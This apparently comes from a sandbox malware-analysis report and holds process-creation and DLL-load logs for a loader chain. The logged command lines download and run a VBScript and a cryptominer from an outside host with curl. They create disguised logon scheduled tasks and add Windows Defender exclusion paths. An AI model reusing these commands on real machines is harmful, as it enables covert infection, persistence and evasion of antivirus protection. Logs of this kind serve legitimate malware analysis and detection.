Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
